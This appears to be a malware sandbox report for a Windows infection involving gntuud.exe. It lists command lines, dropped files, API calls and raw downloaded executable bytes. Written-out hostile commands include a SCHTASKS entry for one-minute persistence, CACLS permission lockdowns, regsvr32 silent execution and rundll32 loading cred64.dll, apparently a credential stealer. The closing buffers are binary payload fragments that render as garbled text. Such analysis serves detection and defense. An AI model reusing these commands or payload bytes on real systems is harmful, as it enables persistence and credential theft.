cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline "C:\Windows\System32\regsvr32.exe" YGCR.s /u -S
cmdline regsvr32 YGCR.s /u -S
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
file C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
file C:\Users\test22\AppData\Local\Temp\YGCR.s
file C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
file C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
file C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
file C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
file C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\9c69749b54" /P "test22:N"&&CACLS "..\9c69749b54" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000001001\linda5.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000002001\nash.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000003001\anon.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\newlege.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\85f469ce401df1\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000058001\mp3studios_97.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000061001\linda5.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000067001\wish.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $cìÍ'£U'£U'£U“RU*£U“PUª£U“QU?£U†ú^U%£U†ú§T5£U†ú T0£U†ú¦T £U.õ U-£U.õ0U"£U'¢UЍ£UÕú¦T£UÕú£T&£UÕú\U&£UÕú¡T&£URich'£UPEL·°´aà b €B€@°@Á44< ø߀X(ÌûTh¢@€ Ü .textú`b `.rdatat €¢f@@.data8]0@À.didat`@À.rsrcøß à@@.relocX(€*ú@Bh>CèâÃÌÌÌÌÌhpBè“-YÃÌÌÌÌèyZ£ÈÏCÃÌÌÌÌ̹ØÏCéìhÌÌÌÌÌ̹àÔCèÌh pBèY-YÃÌÌÌÌÌÌÌÌÌ̹˜àEè,Gh°pBè9-YÃÌÌÌÌÌÌÌÌÌ̹+Eé ÌÌÌÌÌ̹0+Eè)hÀpBè -YÃÌÌÌÌÌÌÌÌÌ̹¢QFèÜFhÐpBèé,YÃÌÌÌÌÌÌÌÌÌ̹*Eè¼FhàpBèÉ,YÃÌÌÌÌÌÌÌÌÌ̹˜+EèQhðpBè©,YÃÌÌÌÌÌÌÌÌÌÌU‹ìì,EüVPÿdF…Àu`‹E3ɉE܍…Ôýÿÿ‰Eä‹E ‰EèEÜP‰MàÇEìA‰Mð‰MôÿTF‹ð…öt)SÿuVÿXF‹Mü…ÀVQ•Ã‹‹r‹Îÿ ‚Bÿ֊Ã[ë2À^ÉÂ̶D$ Pÿt$ ÿt$ ÿ4‘FPÿ0‘F ¶D$ ÷ØÀƒà Pÿt$ ÿt$ ÿ4‘FPÿ@‘F U‹ìƒ} 0tY} u]ŠE ¹0+E$¶ÀPÿuÿuè77öE t>ÿuÿ(‘F…Àt1h!0Pÿ4‘F…Àt!öE thD…BPÿ,‘Fë ÿu¹0+EèÌ62À]¸"oBè(QV‹ñ‰uð蘃eüŽ³è‚VŽ|³ÆEüèsVŽÜ³ÆEüèdVŽ<´ÆEüèUVŽœ´ÆEüèFV‹ÎÆEüèÅ‹Mô‹Æ^d‰ ÉÃU‹ìd¡jÿh.oBPd‰%V‹ñƒ>t€~t ‹FÀPÿ6è¢Fÿ6èÎsY‹Môd‰ ^ÉÃÌÌÌÌÌé®ÿÿÿÁ<´é±V¸ èã'SUVWjjÿ´$( èú‹Œ$ ‹ØèJW½颍D$Pèø$‹ð·Qè¿#€¼$ t „Àt3Àf‰ë„ÀtUh@…BD$PèþTjjD$‹ûP蔋ðfƒ>*u:·NQèt#„Àt,j.Xj\f‰„$XUf‰„$„$SPèÛT¼$ÿ´$( WVèÙ„Àu'‹Œ$ D$UPèQV„À…Dÿÿÿ_^][Ä °ëïU‹ìVjÿu‹ñÿuÿu †|³Pèàþÿÿ„Àt°ë,€}t$ƒ¾ô³tjÿu†Ü³ÿuÿu Pè²þÿÿ„ÀtÒ2À^]ÂV‹ñèt3ÀŽ³f‰†ú’f‰†£f‰†ð’‰†ô’ˆ†ø’èÑUŽ|³èÆUŽÜ³è»UŽœ´è°UŽ<´è¥UŽpq^é´QQSUV‹t$(W‹ù…öt ƒ|$0v3Àf‰‹L$3ÛCSjŠñi(ˆD$‹Ïÿt$‰l$ Uèùþÿÿ„Àu4Ç³‹Ï‰|$èWU‹Ïëÿt$$UWè„Àu‹L$Cè±T‹ø…ÿuá3À_^][YY‹l$ …ítÿt$WèS÷ØÀþÀˆE…öt ÿt$0WVè#S‹ÃëÉV‹ñƒ>t ÿ6è!qƒ&Yƒfƒf^ËT$V‹t$W‹|$…öt¶¶Â3ÈÁê3>CGƒîuè_‹Â^ V‹t$3À9Fu(Wj‹È_‹ÑÑêöÁ‹Êtñ ƒ¸íƒïuê‰ †@=rÚ_^ÂU‹ìƒìLÿuM´èu‹Môƒùs ‹E ‰D´ÿEôM´è]ÉÂU‹ìƒìLÿuM´èF‹Môƒùs‹E ‰D´‹MôA‰Môƒùs ‹E‰D´ÿEôM´èÛ\É 3ÀÇA‰‰Af‰A ‹ÁÃVW‹ñ¸D…BjY‹þó«j 3ÿF WPè(4‹D$ƒÄ ‰~@‰~D‰FH‹Æ_^ÂVÿt$‹ñjè7ÿÿÿj‹Îèî^Âj èã‹D$ÆÂV‹ñ€~ uèÿt$ ÿt$ è†_„ÀuÆF ë2À^ÂV‹ñ€~ uÿt$j èÚþÿÿ‹ÎèÛj‹ÎèŠ^ÂVÿt$ ‹ñÿt$ j èãþÿÿ‹Îèµj ‹Îèd^ÂéU‹ììEPjÿu …øÿÿhP薃č…øÿÿPjègþÿÿ‹MègÉÃÿ€B…Àt$jÿt$ ÿt$ hPjhÿ€B…À•Àë2ÀÂV‹ñè j‹Îè^ÃU‹ìƒìLV‹ñM´jèŠþÿÿM´èD[j‹Îè³^ÉÃV‹ñèèXÿt$ ÿt$ jèþÿÿ‹ÎèÚj‹Îè‰^Âÿt$jèÊÿÿÿÂVÿt$‹ñjè j ‹Îè$^ÂVÿt$ ‹ñÿt$ j è¹ýÿÿ‹Îè‹j ‹Îè:^Âÿt$jèÏÿÿÿÂV‹ñ€~ uÿt$j èTýÿÿ‹ÎèUj‹ÎèÈ^‹T$‹Âƒètƒèt&ƒèt-üuƒ9u‰ÿAƒ9 tõÇëíƒ9tƒ9uãÇëہì$hPè‡þÿÿ„Àt]SUWj [j ]|$ V·f;Ãtf;ÅuƒÇëîf…Àt4SWè6‹ðYY…öuUWè6‹ðYY…öt3Àf‰ƒÆWjèüÿÿ‹þ…öuµ^_][ÄÃU‹ìQV‹uþÿu €yu^ÉÂVèÿÿÿhèCEü‰uüPèí6Ìÿt$ÿt$j!èiüÿÿj¹+EèîþÿÿÂVÿt$ ‹ñÿt$ è j‹Îè–ÿÿÿ^ÂVÿt$ ‹ñÿt$ j è+üÿÿ‹Îèýþÿÿj‹Îè¬þÿÿ^¸˜^CÃU‹ìÿuÿuÿuÿu ÿuèãÿÿÿÿpÿ0è)ƒÄ…ÀyƒÈÿ]ÃIÿ3Àf‰A2ˆA ‰AˆA‰4ˆA0f‰A$‰A‰A(‰A,‹ÁÇH…BfÇAÆAÇA Ã3À‰‰‰‰‰ ‰$‹ÁÃU‹ìd¡jÿh.oBPd‰%ƒyÿÇH…Bt€yu€ytè~ëèI‹Môd‰ ÉÃÌÌÌÌÌÌÌÌÌÌÌÌÌV‹ñè£ÿÿÿöD$t h8Vè YY‹Æ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌSV‹ñ³ƒ~ÿt"€~uƒ~uÿvÿ,€BXÿ÷ÛÛþÃNÿƒf„Ûu8^tF2¹+EPèûÿÿ^ŠÃ[øèXS‹œ$ UVW‹û‹ñÑïöÃu €~0u3íë3íE‹„$ƒ÷ÁçP‰^ Ç@èd·ƒø.tƒ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¿ªùà 0¤‚µ à@  @…0µOà$ µ  H.textØ  ¤ `.rsrc$à¨@@.reloc ¸@BdµHô» ùE0 us# ~ç%-&~æþ¾s$ %€ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢(  o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/   ,rãprp~( () +;rprap~( () o/ -{å(+ {å( (0 þ  9~o1   (2 o3 o4 (5 {å(   (0 þ  95þ¶s6 ~è%-&~æþ¿s7 %€è(+þ·s6 ~é%-&~æþÀs7 %€é(+þ¸s6 ~ê%-&~æþÁs7 %€ê(+oÙ oÛþ¹s8 ~ë%-&~æþÂs9 %€ë(+oÝoãþºs: ~ì%-&~æþÃs; %€ì(+oßþ»s< ~í%-&~æþÄs= %€í(+oá(+,[så%oÙ% rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ% r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ, oB (C :üÿÿÞþo Üo :áûÿÿÞ ,o ÜÞ&Þ+*Adå( µˆ=4&Z ah0’s?  h%ÐÏ(D sE (F (G þ , ÝS( s¦h%У(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+r‘poo(I - o+r‘poo(I - o+r‘poÜor‘p(J   , oK Xo¥þ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0ÇsL (F (G þ , ݞ( s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!‘¶Yoñ%o«oH oó%o«(oõoðjþ,-(N    (O   (P !€µ÷õŸYoñÞ&Þ-+(ô(I þ  , oQ Xo¥þ  :®þÿÿÞ&ÞÞ Þ+*AL` i-„±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA( s¦h%З(D sE o©&8àh%Ь(D sE o§oH h%Ч(D sE oR -h%ÐÒ(D sE oR +  , (s×  h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ  , oS Xo¥þ  : ÿÿÿÞ ÞÞÞ+*ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý( s¦r¡pr p~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL ÐÔà 0¤²µ à@  @…`µOà, Dµ  H.text¡ ¤ `.rsrc,à¨@@.reloc ¸@B”µHô»PùE0 us# ~ç%-&~æþ¾s$ %€ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢(  o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/   ,rãprp~( () +;rprap~( () o/ -{å(+ {å( (0 þ  9~o1   (2 o3 o4 (5 {å(   (0 þ  95þ¶s6 ~è%-&~æþ¿s7 %€è(+þ·s6 ~é%-&~æþÀs7 %€é(+þ¸s6 ~ê%-&~æþÁs7 %€ê(+oÙ oÛþ¹s8 ~ë%-&~æþÂs9 %€ë(+oÝoãþºs: ~ì%-&~æþÃs; %€ì(+oßþ»s< ~í%-&~æþÄs= %€í(+oá(+,[så%oÙ% rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ% r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ, oB (C :üÿÿÞþo Üo :áûÿÿÞ ,o ÜÞ&Þ+*Adå( µˆ=4&Z ah0’s?  h%ÐÏ(D sE (F (G þ , ÝS( s¦h%У(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+r‘poo(I - o+r‘poo(I - o+r‘poÜor‘p(J   , oK Xo¥þ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0ÇsL (F (G þ , ݞ( s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!‘¶Yoñ%o«oH oó%o«(oõoðjþ,-(N    (O   (P !€µ÷õŸYoñÞ&Þ-+(ô(I þ  , oQ Xo¥þ  :®þÿÿÞ&ÞÞ Þ+*AL` i-„±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA( s¦h%З(D sE o©&8àh%Ь(D sE o§oH h%Ч(D sE oR -h%ÐÒ(D sE oR +  , (s×  h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ  , oS Xo¥þ  : ÿÿÿÞ ÞÞÞ+*ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý( s¦r¡pr p~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¹¥XHýÄ6ýÄ6ýÄ6¦¬5÷Ä6¦¬3aÄ6¦¬2ïÄ6(©2ïÄ6(©5ïÄ6(©3ÔÄ6¦¬7òÄ6ýÄ7\Ä6fª?üÄ6fªÉüÄ6fª4üÄ6RichýÄ6PEL7Q‹cà à`‰ð@ @x~ ààð)pOpàO@ð\.text6ßà `.rdata<œðžä@@.dataLD‚@À.rsrcààš@@.reloc)ð*œ@Bhà»BèÀvYÃÌÌÌÌh€»Bè°vYÃÌÌÌÌj h,CC¹”›Cè/`h@¼BèvYÃÌÌÌj hPCC¹”¡Cè`h ¼BèovYÃÌÌÌjhtCC¹ ¢Cèï_h½BèOvYÃÌÌÌj h|CC¹œœCèÏ_h`½Bè/vYÃÌÌÌjh CC¹L¡Cè¯_hÀ½BèvYÃÌÌÌjh´CC¹¼šCè_h ¾BèïuYÃÌÌÌjh+CC¹Ü¡Cèo_h€¾BèÏuYÃÌÌÌjh+CC¹T¢CèO_hà¾Bè¯uYÃÌÌÌjh+CC¹´œCè/_h@¿BèuYÃÌÌÌjh+CC¹\šCè_h ¿BèouYÃÌÌÌjhÐCC¹L›Cèï^hÀBèOuYÃÌÌÌjhÜCC¹|¡CèÏ^h`ÀBè/uYÃÌÌÌjhðCC¹DCè¯^hÀÀBèuYÃÌÌÌj hDC¹|¤Cè^h ÁBèïtYÃÌÌÌj(hDC¹„¥Cèo^h€ÁBèÏtYÃÌÌÌjh@DC¹œŸCèO^hàÁBè¯tYÃÌÌÌjhLDC¹$¥Cè/^h@ÂBètYÃÌÌÌjDhXDC¹”¤Cè^h ÂBèotYÃÌÌÌj\h DC¹lœCèï]hÃBèOtYÃÌÌÌj hEC¹\CèÏ]h`ÃBè/tYÃÌÌÌjhEC¹l™Cè¯]hÀÃBètYÃÌÌÌjhEC¹„ŸCè]h ÄBèïsYÃÌÌÌj<h4EC¹<™Cèo]h€ÄBèÏsYÃÌÌÌj htEC¹$™CèO]hàÄBè¯sYÃÌÌÌjh„EC¹£Cè/]h@ÅBèsYÃÌÌÌj hœEC¹<¥Cè]h ÅBèosYÃÌÌÌjXh°EC¹4žCèï\hÆBèOsYÃÌÌÌjh FC¹T¥CèÏ\h`ÆBè/sYÃÌÌÌjh$FC¹ü¢Cè¯\hÀÆBèsYÃÌÌÌjh0FC¹d¤Cè\h ÇBèïrYÃÌÌÌjh<FC¹,šCèo\h€ÇBèÏrYÃÌÌÌjhDFC¹TŸCèO\hàÇBè¯rYÃÌÌÌjhLFC¹D Cè/\h@ÈBèrYÃÌÌÌjhXFC¹¼ Cè\h ÈBèorYÃÌÌÌjhdFC¹œ™Cèï[hÉBèOrYÃÌÌÌjhpFC¹œ¢CèÏ[h`ÉBè/rYÃÌÌÌjh|FC¹džCè¯[hÀÉBèrYÃÌÌÌjhˆFC¹üŸCè[h ÊBèïqYÃÌÌÌjh”FC¹ ŸCèo[h€ÊBèÏqYÃÌÌÌjh FC¹¤CèO[hàÊBè¯qYÃÌÌÌjh¬FC¹Œ Cè/[h@ËBèqYÃÌÌÌjh¸FC¹ ¥Cè[h ËBèoqYÃÌÌÌjhÄFC¹ô¡CèïZhÌBèOqYÃÌÌÌj hÐFC¹DšCèÏZh`ÌBè/qYÃÌÌÌjhàFC¹¤Cè¯ZhÀÌBèqYÃÌÌÌjhèFC¹œ¥CèZh ÍBèïpYÃÌÌÌjhðFC¹¼£CèoZh€ÍBèÏpYÃÌÌÌjhøFC¹4›CèOZhàÍBè¯pYÃÌÌÌj hGC¹ä¥Cè/Zh@ÎBèpYÃÌÌÌj hGC¹ŒšCèZh ÎBèopYÃÌÌÌjh$GC¹ìCèïYhÏBèOpYÃÌÌÌjh,GC¹›CèÏYh`ÏBè/pYÃÌÌÌjh4GC¹<œCè¯YhÀÏBèpYÃÌÌÌjh<GC¹LžCèYh ÐBèïoYÃÌÌÌjhDGC¹|›CèoYh€ÐBèÏoYÃÌÌÌjhLGC¹¡CèOYhàÐBè¯oYÃÌÌÌj hTGC¹4¡Cè/Yh@ÑBèoYÃÌÌÌjhdGC¹ÔCèYh ÑBèooYÃÌÌÌjhlGC¹Ì™CèïXhÒBèOoYÃÌÌÌjhtGC¹Ô£CèÏXh`ÒBè/oYÃÌÌÌjh|GC¹ä¢Cè¯XhÀÒBèoYÃÌÌÌjhˆGC¹¼CèXh ÓBèïnYÃÌÌÌjhGC¹Ä¤CèoXh€ÓBèÏnYÃÌÌÌjh¤GC¹ŒCèOXhàÓBè¯nYÃÌÌÌjh¸GC¹4¤Cè/Xh@ÔBènYÃÌÌÌjhØGC¹üœCèXh ÔBèonYÃÌÌÌjhìGC¹¬›CèïWhÕBèOnYÃÌÌÌjhHC¹d¡CèÏWh`ÕBè/nYÃÌÌÌjhHC¹ÜžCè¯WhÀÕBènYÃÌÌÌjh(HC¹ü¥CèWh ÖBèïmYÃÌÌÌjh4HC¹ì£CèoWh€ÖBèÏmYÃÌÌÌjhLHC¹´™CèOWhàÖBè¯mYÃÌÌÌjh`HC¹„œCè/Wh@×BèmYÃÌÌÌjhhHC¹|žCèWh ×BèomYÃÌÌÌjh„HC¹ œCèïVhØBèOmYÃÌÌÌjh˜HC¹žCèÏVh`ØBè/mYÃÌÌÌjh¤HC¹´ŸCè¯VhÀØBèmYÃÌÌÌjh°HC¹t£CèVh ÙBèïlYÃÌÌÌjh¼HC¹žCèoVh€ÙBèÏlYÃÌÌÌjhÐHC¹¬¤CèOVhàÙBè¯lYÃÌÌÌjhäHC¹Ì¥Cè/Vh@ÚBèlYÃÌÌÌjhìHC¹<¢CèVh ÚBèolYÃÌÌÌj@høHC¹äœCèïUhÛBèOlYÃÌÌÌjh<IC¹lŸCèÏUh`ÛBè/lYÃÌÌÌjLhHIC¹¬žCè¯UhÀÛBèlYÃÌÌÌj<h˜IC¹ÔšCèUh ÜBèïkYÃÌÌÌj hØIC¹ì CèoUh€ÜBèÏkYÃÌÌÌjhèIC¹<ŸCèOUhàÜBè¯kYÃÌÌÌjhôIC¹”žCè/Uh@ÝBèkYÃÌÌÌjhJC¹¡CèUh ÝBèokYÃÌÌÌj@hJC¹„™CèïThÞBèOkYÃÌÌÌjPhXJC¹Ü¤CèÏTh`ÞBè/kYÃÌÌÌjh¬JC¹ä™Cè¯ThÀÞBèkYÃÌÌÌj4hÀJC¹\£CèTh ßBèïjYÃÌÌÌj høJC¹tCèoTh€ßBèÏjYÃÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ¡ œX|ª°@@ðOà& àCODE”šœ `DATA´° @ÀBSSá дÀ.idata&à´@À.edataOðÄ@P.relocàÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@|:@TObjectd@TObjectX@System„@ IInterfaceÀFSystemÿÿ̃D$øé©KƒD$øéÇKƒD$øéÑKÌ̱@»@Å@ÀFÑ@@L@Ý@L@ @¤<@8\@D\@¸<@¬<@T\@@:@|:@TInterfacedObject‹Àÿ%¨áA‹Àÿ%¤áA‹Àÿ% áA‹Àÿ%œáA‹Àÿ%˜áA‹Àÿ%”áA‹Àÿ%áA‹Àÿ%ŒáA‹Àÿ%ˆáA‹Àÿ%„áA‹Àÿ%€áA‹Àÿ%|áA‹Àÿ%¼áA‹Àÿ%xáA‹Àÿ%¸áA‹Àÿ%táA‹Àÿ%páA‹Àÿ%láA‹Àÿ%háA‹Àÿ%dáA‹Àÿ%`áA‹Àÿ%\áA‹Àÿ%XáA‹Àÿ%TáA‹Àÿ%PáA‹Àÿ%LáA‹Àÿ%HáA‹Àÿ%´áA‹Àÿ%DáA‹Àÿ%@áA‹Àÿ%<áA‹Àÿ%ÌáA‹Àÿ%ÈáA‹Àÿ%ÄáA‹Àÿ%8áA‹Àÿ%4áA‹Àÿ%ÜáA‹Àÿ%ØáA‹Àÿ%ÔáA‹Àÿ%0áA‹Àÿ%,áA‹Àÿ%(áA‹Àÿ%$áA‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ% áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ%áA‹Àÿ% áA‹Àÿ%áA‹Àÿ%áA‹ÀSƒÄô»àÕAƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹ÜÕA‰‹D$£ÜÕA3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹àÕA‰£àÕAYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸äÕAèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸äÕAèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡äÕA‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÀÕA‹èýÿÿ‹D$‰¸äÕA;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡äÕA‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸äÕA;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡äÕA‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÀÕA‹‹‰¸äÕA;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½ôÕAÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½ôÕAÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸ôÕAè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸ôÕAè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUhì@dÿ2d‰"hÄÕAè¼÷ÿÿ€=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ 